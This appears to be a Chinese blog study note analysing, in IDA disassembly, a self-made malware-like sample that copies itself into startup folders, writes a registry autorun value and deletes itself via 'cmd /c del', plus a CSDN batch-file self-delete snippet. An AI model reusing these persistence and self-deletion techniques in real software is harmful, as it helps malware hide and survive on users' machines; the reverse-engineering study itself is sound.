04 复制删除行为IDA反汇编
(很久以前的学习记录,放到博客上来)
(IDA5.0版的不知道为何反汇编进去每一行被截断的景象,惨不忍睹......明明是个正版的。只好回来用拷过来的破解版,依然有一些叽里呱啦的问题,懒得管了,勉强能用。)
之前的一个拷贝自身到C盘下,并删除自身的exe文件(Reverse 01 中的),拖到IDA里反汇编:
.text:00401000 ; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
.text:00401000 _WinMain@16 proc near ; CODE XREF: ___tmainCRTStartup+14Bp
.text:00401000
.text:00401000 Msg = tagMSG ptr -820h
.text:00401000 Filename = byte ptr -804h
.text:00401000 pszPath = byte ptr -404h
.text:00401000 var_4 = dword ptr -4
.text:00401000 hInstance = dword ptr 8
.text:00401000 hPrevInstance = dword ptr 0Ch
.text:00401000 lpCmdLine = dword ptr 10h
.text:00401000 nShowCmd = dword ptr 14h
.text:00401000
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 820h
.text:00401009 mov eax, ___security_cookie
.text:0040100E xor eax, ebp
.text:00401010 mov [ebp+var_4], eax
.text:00401013 push esi
.text:00401014 mov esi, [ebp+hInstance]
.text:00401017 push 400h ; nSize
.text:0040101C lea eax, [ebp+Filename]
.text:00401022 push eax ; lpFilename
.text:00401023 push 0 ; hModule
.text:00401025 call ds:GetModuleFileNameA
.text:0040102B push 0 ; fCreate
.text:0040102D push 7 ; csidl
.text:0040102F lea ecx, [ebp+pszPath]
.text:00401035 push ecx ; pszPath
.text:00401036 push 0 ; hwnd
.text:00401038 call ds:SHGetSpecialFolderPathA
.text:0040103E push offset String2 ; "\\0.exe"
.text:00401043 lea edx, [ebp+pszPath]
.text:00401049 push edx ; lpString1
.text:0040104A call ds:lstrcatA
.text:00401050 lea eax, [ebp+Filename]
.text:00401056 push eax ; lpString2
.text:00401057 lea ecx, [ebp+pszPath]
.text:0040105D push ecx ; lpString1
.text:0040105E call ds:lstrcmpA
.text:00401064 test eax, eax
.text:00401066 jz short loc_40108C
.text:00401068 lea edx, [ebp+pszPath]
.text:0040106E push edx ; pszPath
.text:0040106F call ds:PathFileExistsA
.text:00401075 test eax, eax
.text:00401077 jz short loc_40108C
.text:00401079 xor eax, eax
.text:0040107B pop esi
.text:0040107C mov ecx, [ebp+var_4]
.text:0040107F xor ecx, ebp
.text:00401081 call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:00401086 mov esp, ebp
.text:00401088 pop ebp
.text:00401089 retn 10h
.text:0040108C ; ---------------------------------------------------------------------------
.text:0040108C
.text:0040108C loc_40108C: ; CODE XREF: WinMain(x,x,x,x)+66j
.text:0040108C ; WinMain(x,x,x,x)+77j
.text:0040108C push edi
.text:0040108D mov edi, ds:LoadStringA
.text:00401093 push 64h ; cchBufferMax
.text:00401095 push offset WindowName ; lpBuffer
.text:0040109A push 67h ; uID
.text:0040109C push esi ; hInstance
.text:0040109D call edi ; LoadStringA
.text:0040109F push 64h ; cchBufferMax
.text:004010A1 push offset ClassName ; lpBuffer
.text:004010A6 push 6Dh ; uID
.text:004010A8 push esi ; hInstance
.text:004010A9 call edi ; LoadStringA
.text:004010AB mov eax, esi
.text:004010AD call sub_4011A0
.text:004010B2 push 0 ; lpParam
.text:004010B4 push esi ; hInstance
.text:004010B5 push 0 ; hMenu
.text:004010B7 push 0 ; hWndParent
.text:004010B9 push 64h ; nHeight
.text:004010BB push 0C8h ; nWidth
.text:004010C0 push 64h ; Y
.text:004010C2 push 0C8h ; X
.text:004010C7 push 0CF0000h ; dwStyle
.text:004010CC push offset WindowName ; lpWindowName
.text:004010D1 push offset ClassName ; lpClassName
.text:004010D6 push 0 ; dwExStyle
.text:004010D8 mov hInstance, esi
.text:004010DE call ds:CreateWindowExA
.text:004010E4 mov edi, eax
.text:004010E6 test edi, edi
.text:004010E8 jz loc_40118B
.text:004010EE mov eax, [ebp+nShowCmd]
.text:004010F1 push eax ; nCmdShow
.text:004010F2 push edi ; hWnd
.text:004010F3 call ds:ShowWindow
.text:004010F9 push edi ; hWnd
.text:004010FA call ds:UpdateWindow
.text:00401100 push 6Dh ; lpTableName
.text:00401102 push esi ; hInstance
.text:00401103 call ds:LoadAcceleratorsA
.text:00401109 mov edi, ds:GetMessageA
.text:0040110F push 0 ; wMsgFilterMax
.text:00401111 push 0 ; wMsgFilterMin
.text:00401113 push 0 ; hWnd
.text:00401115 lea ecx, [ebp+Msg]
.text:0040111B push ecx ; lpMsg
.text:0040111C mov esi, eax
.text:0040111E call edi ; GetMessageA
.text:00401120 test eax, eax
.text:00401122 jz short loc_401173
.text:00401124 push ebx
.text:00401125 mov ebx, ds:TranslateAcceleratorA
.text:0040112B jmp short loc_401130
.text:0040112B ; ---------------------------------------------------------------------------
.text:0040112D align 10h
.text:00401130
.text:00401130 loc_401130: ; CODE XREF: WinMain(x,x,x,x)+12Bj
.text:00401130 ; WinMain(x,x,x,x)+170j
.text:00401130 mov eax, [ebp+Msg.hwnd]
.text:00401136 lea edx, [ebp+Msg]
.text:0040113C push edx ; lpMsg
.text:0040113D push esi ; hAccTable
.text:0040113E push eax ; hWnd
.text:0040113F call ebx ; TranslateAcceleratorA
.text:00401141 test eax, eax
.text:00401143 jnz short loc_40115F
.text:00401145 lea ecx, [ebp+Msg]
.text:0040114B push ecx ; lpMsg
.text:0040114C call ds:TranslateMessage
.text:00401152 lea edx, [ebp+Msg]
.text:00401158 push edx ; lpMsg
.text:00401159 call ds:DispatchMessageA
.text:0040115F
.text:0040115F loc_40115F: ; CODE XREF: WinMain(x,x,x,x)+143j
.text:0040115F push 0 ; wMsgFilterMax
.text:00401161 push 0 ; wMsgFilterMin
.text:00401163 push 0 ; hWnd
.text:00401165 lea eax, [ebp+Msg]
.text:0040116B push eax ; lpMsg
.text:0040116C call edi ; GetMessageA
.text:0040116E test eax, eax
.text:00401170 jnz short loc_401130
.text:00401172 pop ebx
.text:00401173
.text:00401173 loc_401173: ; CODE XREF: WinMain(x,x,x,x)+122j
.text:00401173 mov eax, [ebp+Msg.wParam]
.text:00401179 pop edi
.text:0040117A pop esi
.text:0040117B mov ecx, [ebp+var_4]
.text:0040117E xor ecx, ebp
.text:00401180 call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:00401185 mov esp, ebp
.text:00401187 pop ebp
.text:00401188 retn 10h
.text:0040118B ; ---------------------------------------------------------------------------
.text:0040118B
.text:0040118B loc_40118B: ; CODE XREF: WinMain(x,x,x,x)+E8j
.text:0040118B mov ecx, [ebp+var_4]
.text:0040118E pop edi
.text:0040118F xor ecx, ebp
.text:00401191 xor eax, eax
.text:00401193 pop esi
.text:00401194 call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:00401199 mov esp, ebp
.text:0040119B pop ebp
.text:0040119C retn 10h
.text:0040119C _WinMain@16 endp
.text:0040119C
.text:0040119C ; ---------------------------------------------------------------------------
.text:0040119F align 10h
.text:004011A0
.text:004011A0 ; =============== S U B R O U T I N E =======================================
.text:004011A0
.text:004011A0 ; Attributes: bp-based frame
.text:004011A0
.text:004011A0 sub_4011A0 proc near ; CODE XREF: WinMain(x,x,x,x)+ADp
.text:004011A0
.text:004011A0 var_30 = WNDCLASSEXA ptr -30h
.text:004011A0
.text:004011A0 push ebp
.text:004011A1 mov ebp, esp
.text:004011A3 sub esp, 30h
.text:004011A6 push esi
.text:004011A7 mov esi, ds:LoadIconA
.text:004011AD push 6Bh ; lpIconName
.text:004011AF push eax ; hInstance
.text:004011B0 mov [ebp+var_30.cbSize], 30h
.text:004011B7 mov [ebp+var_30.style], 3
.text:004011BE mov [ebp+var_30.lpfnWndProc], offset sub_401380
.text:004011C5 mov [ebp+var_30.cbClsExtra], 0
.text:004011CC mov [ebp+var_30.cbWndExtra], 0
.text:004011D3 mov [ebp+var_30.hInstance], eax
.text:004011D6 call esi ; LoadIconA
.text:004011D8 push 7F00h ; lpCursorName
.text:004011DD push 0 ; hInstance
.text:004011DF mov [ebp+var_30.hIcon], eax
.text:004011E2 call ds:LoadCursorA
.text:004011E8 mov [ebp+var_30.hCursor], eax
.text:004011EB mov eax, [ebp+var_30.hInstance]
.text:004011EE push 6Ch ; lpIconName
.text:004011F0 push eax ; hInstance
.text:004011F1 mov [ebp+var_30.hbrBackground], 6
.text:004011F8 mov [ebp+var_30.lpszMenuName], 6Dh
.text:004011FF mov [ebp+var_30.lpszClassName], offset ClassName
.text:00401206 call esi ; LoadIconA
.text:00401208 lea ecx, [ebp+var_30]
.text:0040120B push ecx ; WNDCLASSEXA *
.text:0040120C mov [ebp+var_30.hIconSm], eax
.text:0040120F call ds:RegisterClassExA
.text:00401215 pop esi
.text:00401216 mov esp, ebp
.text:00401218 pop ebp
.text:00401219 retn
.text:00401219 sub_4011A0 endp
.text:00401219
.text:00401219 ; ---------------------------------------------------------------------------
.text:0040121A align 10h
.text:00401220
.text:00401220 ; =============== S U B R O U T I N E =======================================
.text:00401220
.text:00401220 ; Attributes: bp-based frame
.text:00401220
.text:00401220 sub_401220 proc near ; CODE XREF: sub_401380+DAp
.text:00401220
.text:00401220 String1 = byte ptr -20Ch
.text:00401220 Filename = byte ptr -108h
.text:00401220 var_4 = dword ptr -4
.text:00401220
.text:00401220 push ebp
.text:00401221 mov ebp, esp
.text:00401223 sub esp, 20Ch
.text:00401229 mov eax, ___security_cookie
.text:0040122E xor eax, ebp
.text:00401230 mov [ebp+var_4], eax
.text:00401233 push 104h ; nSize
.text:00401238 lea eax, [ebp+Filename]
.text:0040123E push eax ; lpFilename
.text:0040123F push 0 ; hModule
.text:00401241 call ds:GetModuleFileNameA
.text:00401247 test eax, eax
.text:00401249 jz loc_4012F3
.text:0040124F push 104h ; cchBuffer
.text:00401254 lea ecx, [ebp+Filename]
.text:0040125A push ecx ; lpszShortPath
.text:0040125B mov edx, ecx
.text:0040125D push edx ; lpszLongPath
.text:0040125E call ds:GetShortPathNameA
.text:00401264 test eax, eax
.text:00401266 jz loc_4012F3
.text:0040126C push esi
.text:0040126D push offset aCDel ; "/c del "
.text:00401272 lea eax, [ebp+String1]
.text:00401278 push eax ; lpString1
.text:00401279 call ds:lstrcpyA
.text:0040127F mov esi, ds:lstrcatA
.text:00401285 lea ecx, [ebp+Filename]
.text:0040128B push ecx ; lpString2
.text:0040128C lea edx, [ebp+String1]
.text:00401292 push edx ; lpString1
.text:00401293 call esi ; lstrcatA
.text:00401295 push offset aNul ; " >> NUL"
.text:0040129A lea eax, [ebp+String1]
.text:004012A0 push eax ; lpString1
.text:004012A1 call esi ; lstrcatA
.text:004012A3 push 104h ; nSize
.text:004012A8 lea ecx, [ebp+Filename]
.text:004012AE push ecx ; lpBuffer
.text:004012AF push offset Name ; "ComSpec"
.text:004012B4 call ds:GetEnvironmentVariableA
.text:004012BA pop esi
.text:004012BB test eax, eax
.text:004012BD jz short loc_4012F3
.text:004012BF push 0 ; nShowCmd
.text:004012C1 push 0 ; lpDirectory
.text:004012C3 lea edx, [ebp+String1]
.text:004012C9 push edx ; lpParameters
.text:004012CA lea eax, [ebp+Filename]
.text:004012D0 push eax ; lpFile
.text:004012D1 push 0 ; lpOperation
.text:004012D3 push 0 ; hwnd
.text:004012D5 call ds:ShellExecuteA
.text:004012DB cmp eax, 20h
.text:004012DE jle short loc_4012F3
.text:004012E0 mov eax, 1
.text:004012E5 mov ecx, [ebp+var_4]
.text:004012E8 xor ecx, ebp
.text:004012EA call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:004012EF mov esp, ebp
.text:004012F1 pop ebp
.text:004012F2 retn
.text:004012F3 ; ---------------------------------------------------------------------------
.text:004012F3
.text:004012F3 loc_4012F3: ; CODE XREF: sub_401220+29j
.text:004012F3 ; sub_401220+46j ...
.text:004012F3 mov ecx, [ebp+var_4]
.text:004012F6 xor ecx, ebp
.text:004012F8 xor eax, eax
.text:004012FA call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:004012FF mov esp, ebp
.text:00401301 pop ebp
.text:00401302 retn
.text:00401302 sub_401220 endp
.text:00401302
.text:00401302 ; ---------------------------------------------------------------------------
.text:00401303 align 10h
.text:00401310
.text:00401310 ; =============== S U B R O U T I N E =======================================
.text:00401310
.text:00401310 ; Attributes: bp-based frame
.text:00401310
.text:00401310 ; int __cdecl sub_401310(BYTE *lpData, DWORD cbData)
.text:00401310 sub_401310 proc near ; CODE XREF: sub_401380+D2p
.text:00401310
.text:00401310 dwDisposition = dword ptr -8
.text:00401310 phkResult = dword ptr -4
.text:00401310 lpData = dword ptr 8
.text:00401310 cbData = dword ptr 0Ch
.text:00401310
.text:00401310 push ebp
.text:00401311 mov ebp, esp
.text:00401313 sub esp, 8
.text:00401316 push esi
.text:00401317 lea eax, [ebp+dwDisposition]
.text:0040131A push eax ; lpdwDisposition
.text:0040131B xor esi, esi
.text:0040131D lea ecx, [ebp+phkResult]
.text:00401320 push ecx ; phkResult
.text:00401321 push esi ; lpSecurityAttributes
.text:00401322 push 0F003Fh ; samDesired
.text:00401327 push esi ; dwOptions
.text:00401328 push offset Class ; lpClass
.text:0040132D push esi ; Reserved
.text:0040132E push offset SubKey ; "Software\\Microsoft\\Windows\\CurrentVe"...
.text:00401333 push 80000002h ; hKey
.text:00401338 mov [ebp+phkResult], esi
.text:0040133B call ds:RegCreateKeyExA
.text:00401341 test eax, eax
.text:00401343 jnz short loc_401370
.text:00401345 mov edx, [ebp+cbData]
.text:00401348 mov eax, [ebp+lpData]
.text:0040134B mov ecx, [ebp+phkResult]
.text:0040134E push edx ; cbData
.text:0040134F push eax ; lpData
.text:00401350 push 1 ; dwType
.text:00401352 push esi ; Reserved
.text:00401353 push offset ValueName ; "sample_mal"
.text:00401358 push ecx ; hKey
.text:00401359 call ds:RegSetValueExA
.text:0040135F test eax, eax
.text:00401361 jnz short loc_401366
.text:00401363 lea esi, [eax+1]
.text:00401366
.text:00401366 loc_401366: ; CODE XREF: sub_401310+51j
.text:00401366 mov edx, [ebp+phkResult]
.text:00401369 push edx ; hKey
.text:0040136A call ds:RegCloseKey
.text:00401370
.text:00401370 loc_401370: ; CODE XREF: sub_401310+33j
.text:00401370 mov eax, esi
.text:00401372 pop esi
.text:00401373 mov esp, ebp
.text:00401375 pop ebp
.text:00401376 retn
.text:00401376 sub_401310 endp
.text:00401376
.text:00401376 ; ---------------------------------------------------------------------------
.text:00401377 align 10h
.text:00401380
.text:00401380 ; =============== S U B R O U T I N E =======================================
.text:00401380
.text:00401380 ; Attributes: bp-based frame
.text:00401380
.text:00401380 ; int __stdcall sub_401380(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
.text:00401380 sub_401380 proc near ; DATA XREF: sub_4011A0+1Eo
.text:00401380
.text:00401380 Paint = tagPAINTSTRUCT ptr -848h
.text:00401380 pszPath = byte ptr -808h
.text:00401380 Filename = byte ptr -408h
.text:00401380 var_4 = dword ptr -4
.text:00401380 hWnd = dword ptr 8
.text:00401380 Msg = dword ptr 0Ch
.text:00401380 wParam = dword ptr 10h
.text:00401380 lParam = dword ptr 14h
.text:00401380
.text:00401380 push ebp
.text:00401381 mov ebp, esp
.text:00401383 and esp, 0FFFFFFF8h
.text:00401386 sub esp, 84Ch
.text:0040138C mov eax, ___security_cookie
.text:00401391 xor eax, esp
.text:00401393 mov [esp+84Ch+var_4], eax
.text:0040139A mov eax, [ebp+Msg]
.text:0040139D push ebx
.text:0040139E push esi
.text:0040139F mov esi, [ebp+hWnd]
.text:004013A2 push edi
.text:004013A3 cmp eax, 0Fh
.text:004013A6 ja loc_40149B
.text:004013AC jz loc_40146C
.text:004013B2 mov ecx, eax
.text:004013B4 dec ecx
.text:004013B5 jz loc_40151F
.text:004013BB dec ecx
.text:004013BC jnz loc_4014A2
.text:004013C2 push 400h ; nSize
.text:004013C7 lea eax, [esp+85Ch+Filename]
.text:004013CE push eax ; lpFilename
.text:004013CF push ecx ; hModule
.text:004013D0 call ds:GetModuleFileNameA
.text:004013D6 mov esi, ds:SHGetSpecialFolderPathA
.text:004013DC push 0 ; fCreate
.text:004013DE push 7 ; csidl
.text:004013E0 lea ecx, [esp+860h+pszPath]
.text:004013E4 push ecx ; pszPath
.text:004013E5 push 0 ; hwnd
.text:004013E7 call esi ; SHGetSpecialFolderPathA
.text:004013E9 mov edi, ds:lstrcatA
.text:004013EF push offset String2 ; "\\0.exe"
.text:004013F4 lea edx, [esp+85Ch+pszPath]
.text:004013F8 push edx ; lpString1
.text:004013F9 call edi ; lstrcatA
.text:004013FB mov ebx, ds:CopyFileA
.text:00401401 push 0 ; bFailIfExists
.text:00401403 lea eax, [esp+85Ch+pszPath]
.text:00401407 push eax ; lpNewFileName
.text:00401408 lea ecx, [esp+860h+Filename]
.text:0040140F push ecx ; lpExistingFileName
.text:00401410 call ebx ; CopyFileA
.text:00401412 push 0 ; fCreate
.text:00401414 push 5 ; csidl
.text:00401416 lea edx, [esp+860h+pszPath]
.text:0040141A push edx ; pszPath
.text:0040141B push 0 ; hwnd
.text:0040141D call esi ; SHGetSpecialFolderPathA
.text:0040141F push offset a1_exe ; "\\1.exe"
.text:00401424 lea eax, [esp+85Ch+pszPath]
.text:00401428 push eax ; lpString1
.text:00401429 call edi ; lstrcatA
.text:0040142B push 0 ; bFailIfExists
.text:0040142D lea ecx, [esp+85Ch+pszPath]
.text:00401431 push ecx ; lpNewFileName
.text:00401432 lea edx, [esp+860h+Filename]
.text:00401439 push edx ; lpExistingFileName
.text:0040143A call ebx ; CopyFileA
.text:0040143C lea eax, [esp+858h+pszPath]
.text:00401440 lea edx, [eax+1]
.text:00401443
.text:00401443 loc_401443: ; CODE XREF: sub_401380+C8j
.text:00401443 mov cl, [eax]
.text:00401445 inc eax
.text:00401446 test cl, cl
.text:00401448 jnz short loc_401443
.text:0040144A sub eax, edx
.text:0040144C push eax ; cbData
.text:0040144D lea eax, [esp+85Ch+pszPath]
.text:00401451 push eax ; lpData
.text:00401452 call sub_401310
.text:00401457 add esp, 8
.text:0040145A call sub_401220
.text:0040145F push 0 ; nExitCode
.text:00401461 call ds:PostQuitMessage
.text:00401467 jmp loc_40151F
.text:0040146C ; ---------------------------------------------------------------------------
我是想要找到exe文件执行后如何把自身给删除的,反汇编出来的代码远不止粘出来的这么长,大海捞针,这里截取一部分。
进去sub_401220:
.text:00401220 sub_401220 proc near ; CODE XREF: sub_401380+DAp
.text:00401220
.text:00401220 String1 = byte ptr -20Ch
.text:00401220 Filename = byte ptr -108h
.text:00401220 var_4 = dword ptr -4
.text:00401220
.text:00401220 push ebp
.text:00401221 mov ebp, esp
.text:00401223 sub esp, 20Ch
.text:00401229 mov eax, ___security_cookie
.text:0040122E xor eax, ebp
.text:00401230 mov [ebp+var_4], eax
.text:00401233 push 104h ; nSize
.text:00401238 lea eax, [ebp+Filename]
.text:0040123E push eax ; lpFilename
.text:0040123F push 0 ; hModule
.text:00401241 call ds:GetModuleFileNameA
.text:00401247 test eax, eax
.text:00401249 jz loc_4012F3
.text:0040124F push 104h ; cchBuffer
.text:00401254 lea ecx, [ebp+Filename]
.text:0040125A push ecx ; lpszShortPath
.text:0040125B mov edx, ecx
.text:0040125D push edx ; lpszLongPath
.text:0040125E call ds:GetShortPathNameA
.text:00401264 test eax, eax
.text:00401266 jz loc_4012F3
.text:0040126C push esi
.text:0040126D push offset aCDel ; "/c del "
.text:00401272 lea eax, [ebp+String1]
.text:00401278 push eax ; lpString1
.text:00401279 call ds:lstrcpyA
.text:0040127F mov esi, ds:lstrcatA
.text:00401285 lea ecx, [ebp+Filename]
.text:0040128B push ecx ; lpString2
.text:0040128C lea edx, [ebp+String1]
.text:00401292 push edx ; lpString1
.text:00401293 call esi ; lstrcatA
.text:00401295 push offset aNul ; " >> NUL"
.text:0040129A lea eax, [ebp+String1]
.text:004012A0 push eax ; lpString1
.text:004012A1 call esi ; lstrcatA
.text:004012A3 push 104h ; nSize
.text:004012A8 lea ecx, [ebp+Filename]
.text:004012AE push ecx ; lpBuffer
.text:004012AF push offset Name ; "ComSpec"
.text:004012B4 call ds:GetEnvironmentVariableA
.text:004012BA pop esi
.text:004012BB test eax, eax
.text:004012BD jz short loc_4012F3
.text:004012BF push 0 ; nShowCmd
.text:004012C1 push 0 ; lpDirectory
.text:004012C3 lea edx, [ebp+String1]
.text:004012C9 push edx ; lpParameters
.text:004012CA lea eax, [ebp+Filename]
.text:004012D0 push eax ; lpFile
.text:004012D1 push 0 ; lpOperation
.text:004012D3 push 0 ; hwnd
.text:004012D5 call ds:ShellExecuteA
.text:004012DB cmp eax, 20h
.text:004012DE jle short loc_4012F3
.text:004012E0 mov eax, 1
.text:004012E5 mov ecx, [ebp+var_4]
.text:004012E8 xor ecx, ebp
.text:004012EA call @__security_check_cookie@4 ; __security_check_cookie(x)
.text:004012EF mov esp, ebp
.text:004012F1 pop ebp
.text:004012F2 retn
GetModuleFileNameA, GetShortPathNameA之类的函数不是重点,唯一值得推测的是004012D5 call ds:ShellExecuteA
百度查了一下exe文件删除自身的方法,CSDN上确实有谈论过,也有人指出用ShellExecute可以实现(这点更加让我觉得ShellExecuteA很有可能是删除文件本身的关键所在),用了其上的代码,并没有实现删除exe本身,只是闪现了黑窗口(打开后关闭了黑窗口),可能这个类病毒实现删除自己实在复制过自己到C盘下后,由C盘下exe文件删除了自己?
附CSDN上的代码(并未实现删除exe本身) :
#include <windows.h>
#include <fstream>
using namespace std;
int main()
{
ofstream file;
file.open("1.bat");
file<<"del 1.exe"<<endl;
file<<"del 1.bat"<<endl;
file.close();
ShellExecute(NULL,"open","1.bat","",NULL,SW_SHOWNORMAL);
}
告辞。
04 复制删除行为IDA反汇编的更多相关文章
- IDA反汇编学习
1 转自:http://www.cnblogs.com/vento/archive/2013/02/09/2909579.html IDA Pro是一款强大的反汇编软件,特有的IDA视图和交叉引用,可 ...
- IDA反汇编EXE添加一个启动时的消息框
IDA反汇编EXE添加一个启动时的消息框 上一篇文章介绍了用OD反汇编EXE添加一个启动时的消息框,这篇文章也是实现同样的效果,这边主要的思路还是将其反汇编得到汇编代码后,然后手动修改他的逻辑首先跳转 ...
- centos执行-查看,复制,删除-命令的脚本
==================================================================================================== ...
- linux移动复制删除命令
用mv命令1.作用mv命令来为文件或目录改名或将文件由一个目录移入另一个目录中.该命令等同于DOS系统下的ren和move命令的组合.它的使用权限是所有用户.2.格式mv [options] 源文件或 ...
- Java文件复制删除操作合集
import java.io.*; public class FileOperate { public FileOperate() { } /** * 新建目录 * @param folderPath ...
- vi-vim :删除、撤销、恢复删除、复制删除
删除 1 删除命令 vi命令 操作键 x 删除当前光标处的字符 X 删除光标左边的字符 D 删除从当前光标到本行末尾的字符 J 删除两行之间的换行符 (亦可用于合并两行) dmove 删除从当前光标到 ...
- 管理员技术(二): 访问练习用虚拟机、 命令行基础技巧 、 挂载并访问光盘设备、ls列表及文档创建、复制删除移动
一.访问练习用虚拟机 目标: 学会在教学环境中访问练习用虚拟机,主要完成以下事项: 1> 快速重置教学虚拟机环境 2> 通过“虚拟系统管理器”访问虚拟机 3> ...
- Ubuntu12.04下删除文件夹内所有的.svn文件
前段时间在公司里遇到一个问题,从svn上下载下来的文件含有.svn文件,如何删除当前目录下的所有.svn文件呢? 一个个手动删除显然不可能,太多了.其实在Ubuntu12.04下延伸至其他所搜的Lin ...
- VC++ MFC文件的移动复制删除更名遍历操作
1.判断文件是否存在 利用CFile类和CFileStatus类判断 CFileStatus filestatus; if (CFile::GetStatus(_T("d://softist ...
随机推荐
- top 内存mem的used很高,或者100%
top 内存mem的used很高,或者100% Linux服务器运行一段时间后,由于其内存管理机制,会将暂时不用的内存转为buff/cache,这样在程序使用到这一部分数据时,能够很快的取出,从而提高 ...
- django笔记 - 建站
1,建站步骤:1)django-admin.exe startproject mysite 创建完后的目录结构: - mysite # 对整个程序进行配置 - init - settings # 配置 ...
- LeetCode--350--两个数组的交集2
问题描述: 给定两个数组,编写一个函数来计算它们的交集. 示例 1: 输入: nums1 = [1,2,2,1], nums2 = [2,2] 输出: [2,2] 示例 2: 输入: nums1 = ...
- android -------- Data Binding的使用 ( 四 )ListView
今天来说说DataBinding在列表ListView中的使用 主要分为两种,1: 基本的实体类 2:Observable 定义字段 listView布局文件 <?xml version=&q ...
- CentOS7 安装redis4:
phpredis-4.0.12.tar.gz:下载:wget http://download.redis.io/releases/redis-4.0.12.tar.gz $ tar -zxvf ...
- Django模型类之models字段类型和参数以及元数据meta
models之字段类型和参数 示例: # class Test(models.Model): # courses_test # """测试学习用""& ...
- 函数和函数模版在一个。cpp中的情况!(除了左移和右移,其他的不要用友元函数!!!)
// 友元函数和运算符重载的碰撞.cpp : 定义控制台应用程序的入口点. // #include <iostream> using namespace std; template < ...
- react-native run-ios时报错xcrun: error: unable to find utility "instruments", not a developer tool or in PATH
命令行运行react-native 项目时,报错:xcrun: error: unable to find utility "instruments", not a develop ...
- sqlserver 优化
避免在索引列上使用计算 where子句中,如果索引列是函数的一部分,优化器将不使用索引而使用全表扫描.例如: (低效)select ... from [dept] where [sal]*12> ...
- (待解决,效率低下)47. Permutations II C++回溯法
思路是在相似题Permutations的基础上,将结果放到set中,利用set容器不会出现重复元素的特性,得到所需结果 但是利用代码中的/* */部分通过迭代器遍历set将set中的元素放在一个新的v ...